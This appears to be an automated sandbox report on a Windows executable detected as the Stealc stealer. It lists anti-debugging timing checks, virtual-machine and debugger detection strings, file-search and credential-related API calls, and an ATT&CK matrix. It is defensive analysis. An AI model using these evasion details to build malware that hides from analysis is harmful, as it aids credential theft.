                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC63E second address: 5AC651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jbe 00007F8B146C0A06h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB035 second address: 5AB047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007F8B151F0E36h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB470 second address: 5AB479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB716 second address: 5AB722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8B151F0E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB722 second address: 5AB726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB726 second address: 5AB73F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8B151F0E36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8B151F0E3Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB8B4 second address: 5AB8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB8BC second address: 5AB8C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0361 second address: 5B0367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFEC8 second address: 5AFEFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8B151F0E45h 0x00000008 jmp 00007F8B151F0E41h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B901C second address: 5B9028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8B146C0A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9028 second address: 5B902D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B902D second address: 5B9078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A15h 0x00000007 jnc 00007F8B146C0A08h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F8B146C0A12h 0x00000017 jl 00007F8B146C0A06h 0x0000001d jnp 00007F8B146C0A06h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8B146C0A14h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9078 second address: 5B9082 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B151F0E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9082 second address: 5B9088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9088 second address: 5B908C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B908C second address: 5B9092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9092 second address: 5B909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B909C second address: 5B90A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C07E9 second address: 5C07F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B151F0E3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2FBF second address: 5C2FC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2FC8 second address: 5C2FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B151F0E46h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8B151F0E43h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF586 second address: 5CF58A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF0FC second address: 5CF100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF100 second address: 5CF108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E052F second address: 5E0548 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B151F0E4Bh 0x00000008 jmp 00007F8B151F0E3Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFC97 second address: 5DFC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFDF7 second address: 5DFDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFDFD second address: 5DFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFE02 second address: 5DFE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFF50 second address: 5DFF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E00E9 second address: 5E00ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4ACF second address: 5E4AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4AD3 second address: 5E4AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4AD7 second address: 5E4AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4AE1 second address: 5E4B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jne 00007F8B151F0E4Eh 0x00000011 nop 0x00000012 xor dx, 757Bh 0x00000017 push 00000004h 0x00000019 call 00007F8B151F0E39h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007F8B151F0E36h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4B31 second address: 5E4B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4B37 second address: 5E4B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8B151F0E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4B41 second address: 5E4B6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8B146C0A0Fh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8B146C0A0Fh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4B6E second address: 5E4B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8B151F0E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E4B79 second address: 5E4BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F8B146C0A11h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jnp 00007F8B146C0A06h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6111 second address: 5E611D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B151F0E36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9A38 second address: 5E9A42 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B146C0A06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0295 second address: 52C0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0299 second address: 52C029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C029F second address: 52C02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B151F0E45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02B8 second address: 52C02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02BC second address: 52C02EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8B151F0E3Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F8B151F0E40h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ecx, 74435AF3h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02EC second address: 52C0374 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8B146C0A18h 0x00000008 jmp 00007F8B146C0A15h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F8B146C0A0Eh 0x00000017 xor eax, 65588E58h 0x0000001d jmp 00007F8B146C0A0Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F8B146C0A18h 0x00000029 xor ax, 18B8h 0x0000002e jmp 00007F8B146C0A0Bh 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0374 second address: 52C0378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0378 second address: 52C037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C037C second address: 52C0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0382 second address: 52C0388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C03CD second address: 52C03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C03D1 second address: 52C03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C03D7 second address: 52C03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 46719984h 0x00000010 mov di, C9F0h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C03FC second address: 52C0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0400 second address: 52C0410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 341A8C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 519D27 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_000EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_000EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_000EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_000EBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000F3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000E16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E1160 GetSystemInfo,ExitProcess,0_2_000E1160
                Source: file.exe, file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: KE[OEgQEmUEr[E*`E
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13561
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13564
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13583
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13576
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13616
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E45C0 VirtualProtect ?,00000004,00000100,000000000_2_000E45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000F9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F9750 mov eax, dword ptr fs:[00000030h]0_2_000F9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000F7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000F9600
                Source: file.exe, file.exe, 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_000F7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_000F6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000F7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_000F7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
